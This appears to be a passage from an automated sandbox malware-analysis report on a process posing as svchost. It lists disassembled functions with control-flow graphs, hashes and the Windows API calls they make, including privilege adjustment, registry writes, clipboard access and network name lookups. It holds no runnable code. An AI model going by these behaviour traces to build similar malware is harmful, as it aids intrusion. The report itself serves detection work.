5cc64ec-5cc6534 911->932 912->932 1045 5cc64b7 912->1045 916->917 917->845 924 5cc660e 917->924 924->795 932->757 1047 5cc6eee-5cc6fc1 975->1047 1048 5cc6fc6-5cc7057 975->1048 1052 5cc6eb8 976->1052 1053 5cc6e79-5cc6e99 976->1053 1045->879 1047->856 1048->856 1058 5cc536d 1050->1058 1051->1058 1052->856 1053->1052 1058->665 1087->843
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $\O(l$2(l
                                                                        • API String ID: 0-2610717708
                                                                        • Opcode ID: 007a7c77c6703ab33a417012152ddcf67dec32bf7c6fe02667f6f21f475f1421
                                                                        • Instruction ID: 75063474ee6cec62ea724a411adf93a2b0f8841e5af762c42986ac8e991629ca
                                                                        • Opcode Fuzzy Hash: 007a7c77c6703ab33a417012152ddcf67dec32bf7c6fe02667f6f21f475f1421
                                                                        • Instruction Fuzzy Hash: D8132974A052288FDB25DF20D994BE9B7B2FB58308F0081EAD91967394DF395E86CF41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06532497 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 06532517
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 2874748243-0
                                                                        • Opcode ID: b8aa62e32a3bf0e4a9a443e3d2b6e56e0319841c9a1f45c1ece312d28738356d
                                                                        • Instruction ID: b9e23d64f5b72594f88f1ec43b1140082235345e68f69d32b8b407975e86b9a0
                                                                        • Opcode Fuzzy Hash: b8aa62e32a3bf0e4a9a443e3d2b6e56e0319841c9a1f45c1ece312d28738356d
                                                                        • Instruction Fuzzy Hash: 0621A1755097809FDB228F25DC44B52BFF4EF06310F0984DAE9858F563D275EA08DB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 065324CE Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 06532517
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 2874748243-0
                                                                        • Opcode ID: 7fe15da368147c1c399cfac0f4abc3670bd51355596832934b3e932f8d796717
                                                                        • Instruction ID: 377777cdcab317b1a40dea9944a8190621926c88dd2ba31b0c61763e6d2ce2f4
                                                                        • Opcode Fuzzy Hash: 7fe15da368147c1c399cfac0f4abc3670bd51355596832934b3e932f8d796717
                                                                        • Instruction Fuzzy Hash: BE1191715006009FEB608F55D884B66FBE4FF08610F08C4AAED468B666D375E618DFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC00B8 Relevance: 5.1, Strings: 4, Instructions: 96COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1114 5cc00b8-5cc00cd 1136 5cc00d0 call 33ba23a 1114->1136 1137 5cc00d0 call 33ba20c 1114->1137 1138 5cc00d0 call 3401048 1114->1138 1139 5cc00d0 call 340106e 1114->1139 1116 5cc00d5-5cc00d9 1140 5cc00dc call 33ba2fe 1116->1140 1141 5cc00dc call 33ba2d2 1116->1141 1117 5cc00e1-5cc00f7 1119 5cc00f9-5cc0100 1117->1119 1120 5cc010b-5cc01d5 1117->1120 1121 5cc0107-5cc010a 1119->1121 1142 5cc01d5 call 5cc39bf 1120->1142 1143 5cc01d5 call 5cc3b18 1120->1143 1144 5cc01d5 call 3401048 1120->1144 1145 5cc01d5 call 5cc3801 1120->1145 1146 5cc01d5 call 340106e 1120->1146 1135 5cc01db-5cc01de 1136->1116 1137->1116 1138->1116 1139->1116 1140->1117 1141->1117 1142->1135 1143->1135 1144->1135 1145->1135 1146->1135
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2(l$2(l$5]~i^$E]~i^
                                                                        • API String ID: 0-3139636300
                                                                        • Opcode ID: afe45bdc25954422d1623018e993a0fafbee513377e18c51c5a42538415a27a0
                                                                        • Instruction ID: 67f3822927b658bb7f8f80bc32f1ff8fb48765862abf04d07a3ea12ede5a376a
                                                                        • Opcode Fuzzy Hash: afe45bdc25954422d1623018e993a0fafbee513377e18c51c5a42538415a27a0
                                                                        • Instruction Fuzzy Hash: E631E336B103585FD304EB7598917AE77AAAB82218F14886AD405DF7C1CF7DDC0A8391
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC0118 Relevance: 5.1, Strings: 4, Instructions: 59COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1147 5cc0118-5cc0169 1152 5cc0174-5cc017a 1147->1152 1153 5cc0181-5cc01bd 1152->1153 1158 5cc01c8-5cc01d5 1153->1158 1161 5cc01d5 call 5cc39bf 1158->1161 1162 5cc01d5 call 5cc3b18 1158->1162 1163 5cc01d5 call 3401048 1158->1163 1164 5cc01d5 call 5cc3801 1158->1164 1165 5cc01d5 call 340106e 1158->1165 1160 5cc01db-5cc01de 1161->1160 1162->1160 1163->1160 1164->1160 1165->1160
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2(l$2(l$5]~i^$E]~i^
                                                                        • API String ID: 0-3139636300
                                                                        • Opcode ID: 047ed9c276490b5337361ee4d4f42765034a465a00e121b895f7aa8f594d6f18
                                                                        • Instruction ID: ca49abfffcde83db70fdb2952779150e07006d12cb9211bcb25514a322b61fdd
                                                                        • Opcode Fuzzy Hash: 047ed9c276490b5337361ee4d4f42765034a465a00e121b895f7aa8f594d6f18
                                                                        • Instruction Fuzzy Hash: 8911A53AB102585FD304EA75D8917FD229AD7D2218B54882AD405DFB84CF7DDC0E43E6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC3801 Relevance: 3.0, Strings: 2, Instructions: 496COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1166 5cc3801-5cc3911 1183 5cc3917-5cc3919 1166->1183 1184 5cc3913 1166->1184 1187 5cc3920-5cc3927 1183->1187 1185 5cc391b 1184->1185 1186 5cc3915 1184->1186 1185->1187 1186->1183 1188 5cc39bd-5cc3adf 1187->1188 1189 5cc392d-5cc39b2 1187->1189 1213 5cc3b5b-5cc3bae 1188->1213 1214 5cc3ae1-5cc3b51 1188->1214 1189->1188 1221 5cc3bb5 1213->1221 1222 5cc3bb0 1213->1222 1214->1213 1303 5cc3bb5 call 5cc4298 1221->1303 1304 5cc3bb5 call 3401048 1221->1304 1305 5cc3bb5 call 5cc4287 1221->1305 1306 5cc3bb5 call 340106e 1221->1306 1222->1221 1224 5cc3bbb-5cc3bcf 1225 5cc3c06-5cc3cbb 1224->1225 1226 5cc3bd1-5cc3bfb 1224->1226 1237 5cc3cc1-5cc3cff 1225->1237 1238 5cc3d43 1225->1238 1226->1225 1237->1238 1239 5cc41dd-5cc41e8 1238->1239 1241 5cc41ee-5cc41f5 1239->1241 1242 5cc3d48-5cc3d66 1239->1242 1245 5cc3d68-5cc3d6e 1242->1245 1246 5cc3d71-5cc3d7c 1242->1246 1245->1246 1249 5cc3d82-5cc3d96 1246->1249 1250 5cc4193-5cc41db 1246->1250 1252 5cc3e0e-5cc3e1f 1249->1252 1253 5cc3d98 1249->1253 1250->1239 1255 5cc3e6f-5cc3e7d 1252->1255 1256 5cc3e21-5cc3e4b 1252->1256 1257 5cc3d9d-5cc3dca 1253->1257 1258 5cc4191 1255->1258 1259 5cc3e83-5cc3f36 1255->1259 1256->1255 1266 5cc3e4d-5cc3e69 call 5cc94b1 1256->1266 1257->1252 1258->1239 1279 5cc3f3c-5cc3fbf 1259->1279 1280 5cc3fc6-5cc40bd 1259->1280 1266->1255 1279->1280 1295 5cc414d 1280->1295 1296 5cc40c3-5cc4146 1280->1296 1295->1258 1296->1295 1303->1224 1304->1224 1305->1224 1306->1224
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: \O(l$2(l
                                                                        • API String ID: 0-1462122512
                                                                        • Opcode ID: eab4b87430892ebdca7c2f6c20cd848267cdbfd98c8eca0e85ce9eba9003e72d
                                                                        • Instruction ID: c549c61cdd12a1d8cfed984e3920c918e31b0d11247596021936eefa8f6f1178
                                                                        • Opcode Fuzzy Hash: eab4b87430892ebdca7c2f6c20cd848267cdbfd98c8eca0e85ce9eba9003e72d
                                                                        • Instruction Fuzzy Hash: 63320430A002588FDB18DF74D954BEDB7B2EB59308F1045AAD40AAB794DF799E86CF40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06531F6E Relevance: 1.6, APIs: 1, Instructions: 130registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1307 6531f6e-6532026 1311 653202b-6532037 1307->1311 1312 6532028 1307->1312 1313 6532039 1311->1313 1314 653203c-6532045 1311->1314 1312->1311 1313->1314 1315 6532047 1314->1315 1316 653204a-6532061 1314->1316 1315->1316 1318 65320a3-65320a8 1316->1318 1319 6532063-6532076 RegCreateKeyExW 1316->1319 1318->1319 1320 65320aa-65320af 1319->1320 1321 6532078-65320a0 1319->1321 1320->1321
                                                                        APIs
                                                                        • RegCreateKeyExW.KERNELBASE(?,00000E24), ref: 06532069
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 3fee35ef5fb432b3df46ad2806d0265c7f47f3d6273d1a1b3754ff9fc6cebeac
                                                                        • Instruction ID: c231d98954df0f8778f5cc3a757dca2393fb37e2ceea71cb013d7af292382d15
                                                                        • Opcode Fuzzy Hash: 3fee35ef5fb432b3df46ad2806d0265c7f47f3d6273d1a1b3754ff9fc6cebeac
                                                                        • Instruction Fuzzy Hash: 72418E715097C06FE7238B208C50FA2BFB8EF07614F0945DAE985CB6A3D264A90DCB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0653045F Relevance: 1.6, APIs: 1, Instructions: 98registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1326 653045f-653047f 1327 65304a1-65304d3 1326->1327 1328 6530481-65304a0 1326->1328 1332 65304d6-653052e RegQueryValueExW 1327->1332 1328->1327 1334 6530534-653054a 1332->1334
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,?,?), ref: 06530526
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: e0142b0b9d04e78a76b4ad91022508ce1f286eb85210a093936f113519669f03
                                                                        • Instruction ID: 2c862a3dd0a762f2e5470c96dccac898a164f29759e11e3783acb465f12c47cc
                                                                        • Opcode Fuzzy Hash: e0142b0b9d04e78a76b4ad91022508ce1f286eb85210a093936f113519669f03
                                                                        • Instruction Fuzzy Hash: 0A31BC2510E7C06FD3138B218C61A61BFB4EF47610F0E45CBD8C48F6A3D229A909C7B2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BB1E6 Relevance: 1.6, APIs: 1, Instructions: 97registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1335 33bb1e6-33bb1e8 1336 33bb1ea-33bb1f1 1335->1336 1337 33bb1f2-33bb26d 1335->1337 1336->1337 1341 33bb26f 1337->1341 1342 33bb272-33bb289 1337->1342 1341->1342 1344 33bb2cb-33bb2d0 1342->1344 1345 33bb28b-33bb29e RegOpenKeyExW 1342->1345 1344->1345 1346 33bb2d2-33bb2d7 1345->1346 1347 33bb2a0-33bb2c8 1345->1347 1346->1347
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(?,00000E24), ref: 033BB291
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: Open
                                                                        • String ID:
                                                                        • API String ID: 71445658-0
                                                                        • Opcode ID: f5f16babe0e164f207c0a92e28c5c633dc4431a374fef010cb4145f35ced1c5f
                                                                        • Instruction ID: e6a8ade0cb03412575331f8d246b47ed21e5cd564c2fb93a6b215f68bcc16c94
                                                                        • Opcode Fuzzy Hash: f5f16babe0e164f207c0a92e28c5c633dc4431a374fef010cb4145f35ced1c5f
                                                                        • Instruction Fuzzy Hash: B43190714097846FD722CB619C84FABFFBCEF06210F0884DAE9848B663D224E809C771
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 065311FC Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1352 65311fc-65312bb 1358 653130d-6531312 1352->1358 1359 65312bd-65312c5 getaddrinfo 1352->1359 1358->1359 1361 65312cb-65312dd 1359->1361 1362 6531314-6531319 1361->1362 1363 65312df-653130a 1361->1363 1362->1363
                                                                        APIs
                                                                        • getaddrinfo.WS2_32(?,00000E24), ref: 065312C3
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: getaddrinfo
                                                                        • String ID:
                                                                        • API String ID: 300660673-0
                                                                        • Opcode ID: 41c2f28b032399116ae33f2a7d1ee91594e733f328312558ce0d3b94045d69ae
                                                                        • Instruction ID: 9a75af13a5b8b3f6b520e6048da8b07c6b7a02b2bbe9e7888ec3cf6969bc177d
                                                                        • Opcode Fuzzy Hash: 41c2f28b032399116ae33f2a7d1ee91594e733f328312558ce0d3b94045d69ae
                                                                        • Instruction Fuzzy Hash: F531A2B1504344AFE721CB61DC84FA7FBACEF04714F04489AFA499B692E375A908CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BAA75 Relevance: 1.6, APIs: 1, Instructions: 92fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1367 33baa75-33baafe 1371 33bab03-33bab0f 1367->1371 1372 33bab00 1367->1372 1373 33bab11 1371->1373 1374 33bab14-33bab1d 1371->1374 1372->1371 1373->1374 1375 33bab1f-33bab43 CreateFileW 1374->1375 1376 33bab6e-33bab73 1374->1376 1379 33bab75-33bab7a 1375->1379 1380 33bab45-33bab6b 1375->1380 1376->1375 1379->1380
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 033BAB25
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 08bd032e4c61dea8cff0fa23f8e735aa810be8e8437cd86a200c9462310cd03f
                                                                        • Instruction ID: 9eb30533bbe1c525306f9c524a3e223b7a47d04e49899fbb3e34efe5898e0588
                                                                        • Opcode Fuzzy Hash: 08bd032e4c61dea8cff0fa23f8e735aa810be8e8437cd86a200c9462310cd03f
                                                                        • Instruction Fuzzy Hash: 9E318171509780AFE721CF65DC84F96FBF8EF05210F08849EE9858B652D375E908CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BB036 Relevance: 1.6, APIs: 1, Instructions: 89synchronizationCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1383 33bb036-33bb0b9 1387 33bb0bb 1383->1387 1388 33bb0be-33bb0c7 1383->1388 1387->1388 1389 33bb0c9 1388->1389 1390 33bb0cc-33bb0d5 1388->1390 1389->1390 1391 33bb0d7-33bb0fb CreateMutexW 1390->1391 1392 33bb126-33bb12b 1390->1392 1395 33bb12d-33bb132 1391->1395 1396 33bb0fd-33bb123 1391->1396 1392->1391 1395->1396
                                                                        APIs
                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 033BB0DD
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMutex
                                                                        • String ID:
                                                                        • API String ID: 1964310414-0
                                                                        • Opcode ID: c74a784a43c320fd2a904c580e80b517a117bf23353f11a3cd5d04469eea6287
                                                                        • Instruction ID: c39f1f6046756b349c1daab6e8ba64da0358c3045463492ab298abcc2b1ee557
                                                                        • Opcode Fuzzy Hash: c74a784a43c320fd2a904c580e80b517a117bf23353f11a3cd5d04469eea6287
                                                                        • Instruction Fuzzy Hash: 2D31D3715093805FE711CB21DC84BA6FFF8EF06210F08849AE984CB693D775E908C762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BB2D9 Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1399 33bb2d9-33bb357 1402 33bb359 1399->1402 1403 33bb35c-33bb365 1399->1403 1402->1403 1404 33bb36a-33bb370 1403->1404 1405 33bb367 1403->1405 1406 33bb372 1404->1406 1407 33bb375-33bb38c 1404->1407 1405->1404 1406->1407 1409 33bb38e-33bb3a1 RegQueryValueExW 1407->1409 1410 33bb3c3-33bb3c8 1407->1410 1411 33bb3ca-33bb3cf 1409->1411 1412 33bb3a3-33bb3c0 1409->1412 1410->1409 1411->1412
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 033BB394
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: 414f49446da598629e50ce75c8f95a0b7880f1bb1fa0bb622849423e7ed851f8
                                                                        • Instruction ID: 67f9ac2ba0a5afc022a608a2edb65d62b4254495be08cf6f48d9ebf35a402312
                                                                        • Opcode Fuzzy Hash: 414f49446da598629e50ce75c8f95a0b7880f1bb1fa0bb622849423e7ed851f8
                                                                        • Instruction Fuzzy Hash: FD3193755093806FD722CB61DC84FA3FFBCEF06214F08849AE9498B652D664E548CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 065309F0 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1416 65309f0-6530a71 1420 6530a73 1416->1420 1421 6530a76-6530a7f 1416->1421 1420->1421 1422 6530a81-6530a89 ConvertStringSecurityDescriptorToSecurityDescriptorW 1421->1422 1423 6530ad7-6530adc 1421->1423 1425 6530a8f-6530aa1 1422->1425 1423->1422 1426 6530aa3-6530ad4 1425->1426 1427 6530ade-6530ae3 1425->1427 1427->1426
                                                                        APIs
                                                                        • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E24), ref: 06530A87
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: DescriptorSecurity$ConvertString
                                                                        • String ID:
                                                                        • API String ID: 3907675253-0
                                                                        • Opcode ID: 53828b55123c78d8cc3a2e806b93130f4f2fa00ab76f9921bbad30e081716eb0
                                                                        • Instruction ID: 0fd5f0791f7b40fd5c95c6a1f980a6476d3522495dafb18bdfc5b4599af5848d
                                                                        • Opcode Fuzzy Hash: 53828b55123c78d8cc3a2e806b93130f4f2fa00ab76f9921bbad30e081716eb0
                                                                        • Instruction Fuzzy Hash: DC319172504384AFE721CF64DC45FA7BFE8EF45610F0884AAE944DB692E364E909CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 065310F4 Relevance: 1.6, APIs: 1, Instructions: 87timeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1431 65310f4-6531189 1437 65311d6-65311db 1431->1437 1438 653118b-6531193 GetProcessTimes 1431->1438 1437->1438 1439 6531199-65311ab 1438->1439 1441 65311dd-65311e2 1439->1441 1442 65311ad-65311d3 1439->1442 1441->1442
                                                                        APIs
                                                                        • GetProcessTimes.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 06531191
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ProcessTimes
                                                                        • String ID:
                                                                        • API String ID: 1995159646-0
                                                                        • Opcode ID: 81351fbd3e56129251ecf1096741da2caac1a1f7f3e6027305bc5350790df288
                                                                        • Instruction ID: 213dba79ced70749868c682d246c9d78c98995350180bf7cda24025c5a78d849
                                                                        • Opcode Fuzzy Hash: 81351fbd3e56129251ecf1096741da2caac1a1f7f3e6027305bc5350790df288
                                                                        • Instruction Fuzzy Hash: 6721E9725057806FE7228F61DC45FA7BFB8EF06314F04849AE944DB193D3659509CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06531FCE Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1445 6531fce-6532026 1448 653202b-6532037 1445->1448 1449 6532028 1445->1449 1450 6532039 1448->1450 1451 653203c-6532045 1448->1451 1449->1448 1450->1451 1452 6532047 1451->1452 1453 653204a-6532061 1451->1453 1452->1453 1455 65320a3-65320a8 1453->1455 1456 6532063-6532076 RegCreateKeyExW 1453->1456 1455->1456 1457 65320aa-65320af 1456->1457 1458 6532078-65320a0 1456->1458 1457->1458
                                                                        APIs
                                                                        • RegCreateKeyExW.KERNELBASE(?,00000E24), ref: 06532069
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 6235c9a268d5a8d23cc2d35b6f5bdc6ea1ada2eddd49917c58380a2653f0b419
                                                                        • Instruction ID: f236070fc976921ef0901ff84f06485c1c633fa9709b4cca1a5b569087dcd189
                                                                        • Opcode Fuzzy Hash: 6235c9a268d5a8d23cc2d35b6f5bdc6ea1ada2eddd49917c58380a2653f0b419
                                                                        • Instruction Fuzzy Hash: 67219C72900604AFEB21DE25CC84FA7BBECEF08A14F08895AE945D6651E734E50CCEA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BA6CE Relevance: 1.6, APIs: 1, Instructions: 85comclipboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OleGetClipboard.OLE32(?,00000E24,?,?), ref: 033BA77E
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard
                                                                        • String ID:
                                                                        • API String ID: 220874293-0
                                                                        • Opcode ID: 49f180ba6614b1f2a004548e64769523c01fc49748f9797361328c8cdd85bcf3
                                                                        • Instruction ID: dbc0648cdf7ebeeb6450c5b0fd92b378cc4991ca6448876be5cbe6537f9628bc
                                                                        • Opcode Fuzzy Hash: 49f180ba6614b1f2a004548e64769523c01fc49748f9797361328c8cdd85bcf3
                                                                        • Instruction Fuzzy Hash: E8317E7504E3C06FD3138B259C61B62BFB4EF47614F0A40CBE884CB6A3D2296819D772
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0653121E Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • getaddrinfo.WS2_32(?,00000E24), ref: 065312C3
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: getaddrinfo
                                                                        • String ID:
                                                                        • API String ID: 300660673-0
                                                                        • Opcode ID: 3b2fee32dbdca9261ed955becabd3a9574c94edf482d5fdcf4726459e183a497
                                                                        • Instruction ID: d7dced928a6cbb923028c0496865835169d5a9cd5547ccdd9d2dabdc07e6b03b
                                                                        • Opcode Fuzzy Hash: 3b2fee32dbdca9261ed955becabd3a9574c94edf482d5fdcf4726459e183a497
                                                                        • Instruction Fuzzy Hash: 0E21A371500204AEFB30DB61DC84FAAF7ACEF04714F04885AFA49DA681E775A5098B71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BB4C8 Relevance: 1.6, APIs: 1, Instructions: 82windowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageTimeoutA.USER32(?,00000E24), ref: 033BB571
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendTimeout
                                                                        • String ID:
                                                                        • API String ID: 1599653421-0
